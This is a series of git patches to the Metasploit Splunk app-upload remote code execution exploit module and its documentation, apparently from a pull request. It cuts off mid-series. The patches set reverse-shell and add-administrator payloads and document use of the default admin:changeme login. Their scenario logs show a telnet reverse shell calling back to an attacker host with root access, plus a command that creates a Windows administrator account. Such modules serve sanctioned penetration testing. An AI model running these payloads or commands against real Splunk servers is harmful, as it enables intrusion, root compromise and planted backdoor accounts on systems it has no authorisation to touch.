d7d49cba2e9bb6f365380b25880a9249da2b4e76 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 15:20:28 +0100 Subject: [PATCH 13/42] Update splunk_upload_app_exec.md --- .../exploit/multi/http/splunk_upload_app_exec.md | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 106147dc7246..5115071e6b1f 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -20,14 +20,10 @@ Version 7.2.4 has been tested successfully against OSX as well. 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` - 8. If targeting linux or macos set proper payload - * ```SET TARGET [1|3]``` - * ```set payload cmd/unix/reverse_python``` - - If targeting windows set proper payload - * ```SET TARGET 2``` - * ```set payload cmd/windows/adduser``` - 9. You should get a reverse shell on port 4444 via the predefined handler. + 8. (7.2.4 only) If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. + If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. + + 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) ## External Demo * [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
From 3316e8c4bfe03cc04879e2cd696d64ee0e37799b Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 19:00:33 +0100 Subject: [PATCH 14/42] fixed standard payload syntax --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 2ae0a186bdb3..ce131ec3d506 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -48,21 +48,21 @@ def initialize(info = {}) [ 'Splunk >= 7.2.4 / Linux', { 'Arch' => ARCH_CMD, - 'Platform' => %w(linux unix) + 'Platform' => %w(linux unix), 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], [ 'Splunk >= 7.2.4 / Windows', { 'Arch' => ARCH_CMD, - 'Platform' => 'win' + 'Platform' => 'win', 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'} } ], [ 'Splunk >= 7.2.4 / OSX', { 'Arch' => ARCH_CMD, - 'Platform' => %w(linux unix) + 'Platform' => %w(linux unix), 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], From 245a6cac63967443bf13e5f2eb1ebcbc726c8ea0 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 19:03:35 +0100 Subject: [PATCH 15/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 5115071e6b1f..e865d0ca72c5 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -15,13 +15,13 @@ Version 7.2.4 has been tested successfully against OSX as well. 1. Start msfconsole 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` 3. Set required variables (you will need admin credentials) - 4. Do: ```SET TARGET 1``` + 4. Do: ```SET LHOST 192.168.1.2``` 5. Do: ```SET RHOST 192.168.1.1``` 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` - 8. (7.2.4 only) If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. - If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. + 8. * (7.2.4 only) If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. + * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) From 983442d690e7ab473fe61a572db7c97aeb8dfa9d Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 19:04:45 +0100 Subject: [PATCH 16/42] Update splunk_upload_app_exec.rb --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index ce131ec3d506..2dd16e74a62f 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -69,13 +69,15 @@ def initialize(info = {}) [ 'Splunk >= 5.0.1 / Linux', { 'Arch' => ARCH_CMD, - 'Platform' => %w(linux unix) + 'Platform' => %w(linux unix), + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], [ 'Splunk >= 5.0.1 / Windows', { 'Arch' => ARCH_CMD, - 'Platform' => 'win' + 'Platform' => 'win', + 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'} } ] ], From 998f9403ffeb1023d3e84f340aef3b0bf7b66486 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 19:04:57 +0100 Subject: [PATCH 17/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index e865d0ca72c5..a21632fdb996 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -20,7 +20,7 @@ Version 7.2.4 has been tested successfully against OSX as well. 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` - 8. * (7.2.4 only) If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. + 8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) From f0dee60d589295e819c022f4be18073939b2dc2f Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:30:03 +0100 Subject: [PATCH 18/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index a21632fdb996..5d0449a11d13 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -1,7 +1,7 @@ ## Vulnerable Application This module exploits a feature of Splunk whereby a custom application can be -uploaded through the web based interface. Through the \'script\' search command a +uploaded through the web based interface. Through the `script` search command a user can call commands defined in their custom application which includes arbitrary perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of "admin:changeme", From 3ca4a9bc03cdc92a4f71761b5df6ab015a15c600 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:36:35 +0100 Subject: [PATCH 19/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 5d0449a11d13..b7d262c7bb4a 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -5,9 +5,9 @@ uploaded through the web based interface. Through the `script` search command a user can call commands defined in their custom application which includes arbitrary perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of "admin:changeme", -the default Administrator credential for Splunk. Note that the Splunk web interface -runs as SYSTEM on Windows, or as root on Linux by default. This module has been -tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. +the default Administrator credential for Splunk. +Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. +This module has been tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. Version 7.2.4 has been tested successfully against OSX as well. ## Verification Steps From d739ac231551724426e8b5d30ddce8db62b936c4 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:44:12 +0100 Subject: [PATCH 20/42] added tested list OS --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b7d262c7bb4a..b3a7475b45f4 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -7,8 +7,11 @@ perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of "admin:changeme", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. -This module has been tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. -Version 7.2.4 has been tested successfully against OSX as well. +This module has been tested successfully against: + +* 5.0 ([Ubuntu 10.04](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564), [Windows XP and Windows Server 2003 SP2](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564) with splunk-5.0.1-143156) +* 6.1, 6.1.1 +* 7.2.4 (OSX 10.14.3, Windows 10 10.0.17134.1, CentOS7 3.10.0-957.1.3.el7.x86_64) ## Verification Steps From ca234a1f9b96c1df8aebb2c2925ab3753f2e225f Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:45:42 +0100 Subject: [PATCH 21/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b3a7475b45f4..4eb9a5f2d555 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -18,8 +18,8 @@ This module has been tested successfully against: 1. Start msfconsole 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` 3. Set required variables (you will need admin credentials) - 4. Do: ```SET LHOST 192.168.1.2``` - 5. Do: ```SET RHOST 192.168.1.1``` + 4. Do: ```SET LHOST [ip]``` + 5. Do: ```SET RHOST [ip]``` 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` From e5653e348dc0cfc23d6421c00799f7f8059ba4ce Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:52:07 +0100 Subject: [PATCH 22/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 4eb9a5f2d555..ee58fedcc68c 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -20,8 +20,6 @@ This module has been tested successfully against: 3. Set required variables (you will need admin credentials) 4. Do: ```SET LHOST [ip]``` 5. Do: ```SET RHOST [ip]``` - 6. Do: ```SET USERNAME admin``` - 7. Do: ```SET PASSWORD changeme``` 8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. From a09ee632e825be43221056350958d041d4f4d154 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:53:55 +0100 Subject: [PATCH 23/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index ee58fedcc68c..612746a46c4b 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -27,9 +27,11 @@ This module has been tested successfully against: 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) ## External Demo -* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
-* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
-* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) + +* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html) + +* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script) ## Options From a0adb779b9e378f766036576b86757b46a727dcc Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:54:52 +0100 Subject: [PATCH 24/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 612746a46c4b..10f3d14096f1 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -37,7 +37,7 @@ This module has been tested successfully against: **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. - Is not enabled by default. + Default is `false` ## Scenarios From c5c597ec17a7ae5bf80b4a51bb5082c8203eb276 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:56:54 +0100 Subject: [PATCH 25/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 10f3d14096f1..a198006f8a51 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -41,9 +41,7 @@ This module has been tested successfully against: ## Scenarios -### Testing against 7.2.4 running on OSX - - Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API. +### Testing against 7.2.4 running on OSX 10.14.3 ``` msf5 exploit(multi/http/splunk_upload_app_exec) > From 3fc4a4cb5881e5329578d6685d022518f1b7bfef Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 11:00:11 +0100 Subject: [PATCH 26/42] Update splunk_upload_app_exec.md --- .../multi/http/splunk_upload_app_exec.md | 152 +++++++++++++++++- 1 file changed, 151 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index a198006f8a51..86138e0c83db 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -41,7 +41,7 @@ This module has been tested successfully against: ## Scenarios -### Testing against 7.2.4 running on OSX 10.14.3 +### Tested against 7.2.4 running on OSX 10.14.3 ``` msf5 exploit(multi/http/splunk_upload_app_exec) > @@ -86,3 +86,153 @@ msf5 exploit(multi/http/splunk_upload_app_exec) > exploit [*] B is input... [*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 ``` + +### Tested against 7.2.4 splunk-5.0.1-143156 on Ubuntu 10.04 + +``` +msf > use exploit/multi/http/splunk_upload_app_exec +msf exploit(splunk_upload_app_exec) > show options + +Module options (exploit/multi/http/splunk_upload_app_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASSWORD changeme yes The password for the specified username + Proxies no Use a proxy chain + RHOST yes The target address + RPORT 8000 yes The target port + SPLUNK_APP_FILE /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz yes The "rogue" Splunk application tgz + USERNAME admin yes The username with admin role to authenticate as + VHOST no HTTP server virtual host + + +Exploit target: + + Id Name + -- ---- + 0 Splunk 5.0.1 / Linux + + +msf exploit(splunk_upload_app_exec) > set RHOST 192.168.1.137 +RHOST => 192.168.1.137 +msf exploit(splunk_upload_app_exec) > rexploit +[*] Reloading module... + +[*] Using command: sh -c '(sleep 4597|telnet 192.168.1.129 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.129 4444 >/dev/null 2>&1 &)' +[*] Authenticating... +[*] Started reverse double handler +[*] Fetching csrf token from /en-US/manager/launcher/apps/local +[*] Uploading file upload_app_exec.tgz +[*] upload_app_exec successfully uploaded +[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline +[*] Invoking script command +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo uyYJGuNfu2AetK0N; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "uyYJGuNfu2AetK0N\r\n" +[*] Matching... +[*] B is input... +[*] Command shell session 1 opened (192.168.1.129:4444 -> 192.168.1.137:41432) at 2012-12-07 11:53:35 +0100 + +id +uid=0(root) gid=0(root) groups=0(root) +``` + +### Tested against splunk-5.0.1-143156 on Windows XP + +``` +msf exploit(splunk_upload_app_exec) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Splunk 5.0.1 / Linux + 1 Splunk 5.0.1 / Windows + + +msf exploit(splunk_upload_app_exec) > set target 1 +target => 1 +msf exploit(splunk_upload_app_exec) > set payload cmd/windows/adduser +payload => cmd/windows/adduser +msf exploit(splunk_upload_app_exec) > show options + +Module options (exploit/multi/http/splunk_upload_app_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASSWORD changeme yes The password for the specified username + Proxies no Use a proxy chain + RHOST 192.168.1.137 yes The target address + RPORT 8000 yes The target port + SPLUNK_APP_FILE /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz yes The "rogue" Splunk application tgz + USERNAME admin yes The username with admin role to authenticate as + VHOST no HTTP server virtual host + + +Payload options (cmd/windows/adduser): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CUSTOM no Custom group name to be used instead of default + PASS Metasploit$1 yes The password for this user + USER metasploit yes The username to create + WMIC false yes Use WMIC on the target to resolve administrators group + + +Exploit target: + + Id Name + -- ---- + 1 Splunk 5.0.1 / Windows + + +msf exploit(splunk_upload_app_exec) > rexploit +[*] Reloading module... + +[*] Using command: cmd.exe /c net user metasploit Metasploit$1 /ADD && net localgroup Administrators metasploit /ADD +[*] Authenticating... +[*] Fetching csrf token from /en-US/manager/launcher/apps/local +[*] Uploading file upload_app_exec.tgz +[*] upload_app_exec successfully uploaded +[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline +[*] Invoking script command +``` + +After that, on the victim machine: + +``` +C:\Documents and Settings\Administrator>net user metasploit +User name metasploit +Full Name +Comment +User's comment +Country code 000 (System Default) +Account active Yes +Account expires Never + +Password last set 12/6/2012 11:19 PM +Password expires 1/18/2013 10:07 PM +Password changeable 12/6/2012 11:19 PM +Password required Yes +User may change password Yes + +Workstations allowed All +Logon script +User profile +Home directory +Last logon Never + +Logon hours allowed All + +Local Group Memberships *Administrators *Users +Global Group memberships *None +The command completed successfully. + + +C:\Documents and Settings\Administrator> +``` From 087cef380d0f72b8370491081891c13fc9a10c56 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 11:02:01 +0100 Subject: [PATCH 27/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 86138e0c83db..88ef28669ad5 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -38,6 +38,10 @@ This module has been tested successfully against: **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. Default is `false` + **USERNAME** + Default is `admin` + **PASSWORRD** + Default is `changeme` ## Scenarios From 698cf5ea916d78756f66f77801bd7847d4b20398 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 11:02:44 +0100 Subject: [PATCH 28/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 88ef28669ad5..2026174a34d0 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -38,9 +38,11 @@ This module has been tested successfully against: **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. Default is `false` + **USERNAME** Default is `admin` - **PASSWORRD** + + **PASSWORD** Default is `changeme` ## Scenarios From f98ad82583c1c99cc61691fedfeb1a5423fa2cfe Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 13:46:44 +0100 Subject: [PATCH 29/42] Update modules/exploits/multi/http/splunk_upload_app_exec.rb Co-Authored-By: avanzo --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 2dd16e74a62f..0dfec1e6c5e1 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -464,7 +464,7 @@ def do_get_state_token(uri) @state_token = Regexp.last_match(1) unless @state_token - fail_with(Failure::Unknown, "state token form Key not found") unless @state_token + fail_with(Failure::Unknown, "state token form Key not found") end end From 109b2bcf7e5ec38d3af015e217472392e7ebdc37 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 13:46:57 +0100 Subject: [PATCH 30/42] Update modules/exploits/multi/http/splunk_upload_app_exec.rb Co-Authored-By: avanzo --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 0dfec1e6c5e1..b48de4c03d29 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -465,7 +465,6 @@ def do_get_state_token(uri) unless @state_token fail_with(Failure::Unknown, "state token form Key not found") - end end From 290a4221024de46803cd77da99348bf4c4ce89dc Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 13:56:32 +0100 Subject: [PATCH 31/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 2026174a34d0..b73714c5f0f5 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -24,7 +24,7 @@ This module has been tested successfully against: 8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. - 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) + 7. You should get either a reverse shell on port 4444 via the predefined handler (Linux/OSX) or a new user in case (windows target) ## External Demo * [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) From aff77e58bfc1613df40e2ea2a04998736647bd8c Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 13:57:19 +0100 Subject: [PATCH 32/42] Update modules/exploits/multi/http/splunk_upload_app_exec.rb Co-Authored-By: avanzo --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index b48de4c03d29..02702a3d3dde 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -416,7 +416,7 @@ def do_upload_app_7(app_name, file_name) { 'uri' => '/en-US/manager/appinstall/_upload', 'method' => 'POST', - 'cookie' => "#{@auth_cookies};", + 'cookie' => @auth_cookies, 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => data }, 30) From 98a7938837143827c2f2a02f4f30db1ecc18e5b5 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 14:42:56 +0100 Subject: [PATCH 33/42] Update splunk_upload_app_exec.rb --- .../multi/http/splunk_upload_app_exec.rb | 16 ++++++---------- 1 file changed, 6 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 02702a3d3dde..624cff321ba5 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -124,19 +124,18 @@ def exploit @state_token = '' @splunkweb_csrf_token_8000_id = '' @csrf_form_port = "splunkweb_csrf_token_#{rport}" # Default to using rport, corrected during tokenization for v6 below. - @ver7 = false # splunk version 7 boolean - + @ver7 = false # splunk version 7 boolean app_name = 'upload_app_exec' p = payload.encoded print_status("Using command: #{p}") cmd = Rex::Text.encode_base64(p) - # check if the target version is 7.2.4 + # check if the target version is 7.2.4 if target.name.include? "7.2.4" @ver7 = true end - do_login + do_login # fetch the csrf token for use in the upload next if @ver7 == true @@ -158,7 +157,7 @@ def exploit # get the next csrf token from our new app do_get_csrf("/en-US/app/#{app_name}/flashtimeline") end - + # call our command execution function with the Splunk 'script' command print_status("Invoking script command") if @ver7 == true @@ -345,7 +344,7 @@ def do_login @auth_cookies = "#{session_id_port}=#{session_id}" end end - + def do_upload_app(app_name, file_name) archive_file_name = ::File.basename(file_name) print_status("Uploading file #{archive_file_name}") @@ -397,21 +396,18 @@ def do_upload_app_7(app_name, file_name) data = "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"state\"\r\n" data << "\r\n#{@state_token}\r\n" - data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n" data << "\r\n#{@splunkweb_csrf_token_8000_id}\r\n" - data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n" data << "Content-Type: application/x-compressed-tar\r\n\r\n" data << file_data data << "\r\n--#{boundary}\r\n" - data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n" data << "1" data << "\r\n--#{boundary}--\r\n" - + res = send_request_cgi( { 'uri' => '/en-US/manager/appinstall/_upload', From c9dcdf1b665e2c31e4dc745dc6ba94dd7242d4dd Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 14:58:31 +0100 Subject: [PATCH 34/42] new error logic --- .../exploits/multi/http/splunk_upload_app_exec.rb | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 624cff321ba5..3ca94d1b4c25 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -417,12 +417,19 @@ def do_upload_app_7(app_name, file_name) 'data' => data }, 30) - if res && (res.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/)) - print_good("#{app_name} successfully uploaded") - else + unless res + fail_with(Failure::Unreachable, "Connection failed") + end + + unless res.code == 303 || res.code == 200 + fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})") + end + + if res.body.include?('There was an error processing the upload') fail_with(Failure::Unknown, "Error uploading") end - end + + print_good("#{app_name} successfully uploaded") def do_get_csrf(uri) print_status("Fetching csrf token from #{uri}") From 92c163cb0da9f3372e950b2d2d87bece85ccace1 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 15:00:26 +0100 Subject: [PATCH 35/42] Update 